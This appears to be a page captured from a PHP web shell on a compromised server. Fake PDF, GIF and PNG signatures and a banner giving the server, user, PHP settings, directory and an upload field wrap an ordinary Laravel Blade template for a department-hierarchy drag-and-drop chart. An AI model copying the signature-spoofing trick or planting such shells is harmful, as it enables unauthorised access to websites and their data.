%PDF- %GIF98; %PNG;
Server : ApacheSystem : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64 User : addictionfreeind ( 1003) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Directory : /home/addictionfreeind/www/admin1/resources/views/departments-hierarchy/ |
Upload File : |
<div class="chartHeading mt-3 bg-white text-capitalize d-flex justify-content-between p-20 rounded-top">
<h3 class="f-21 f-w-500 mb-0">@lang('modules.department.dragAndDrop')</h3>
</div>
<div id="dragRoot" class="pt-3 rounded-bottom">
@foreach ($departments as $department)
<ul>
<li value="{{$department->id}}" >
<span id="{{$department->id}}" class="node-cpe">→ {{ $department->team_name }}</span>
@if ($department->childs)
@include('departments-hierarchy.manage_hierarchy', [
'childs' => $department->childs,'parent_id' => $department->id
])
@endif
</li>
</ul>
@endforeach
<ul id="pre-state"></ul>
<ul id="drophere" ondragstart="return false;" ondrop="return false;">
<li><span id="NewNode" class="node-cpe">@lang('app.new') @lang('modules.department.hierarchy')</span></span></li>
</ul>
</div>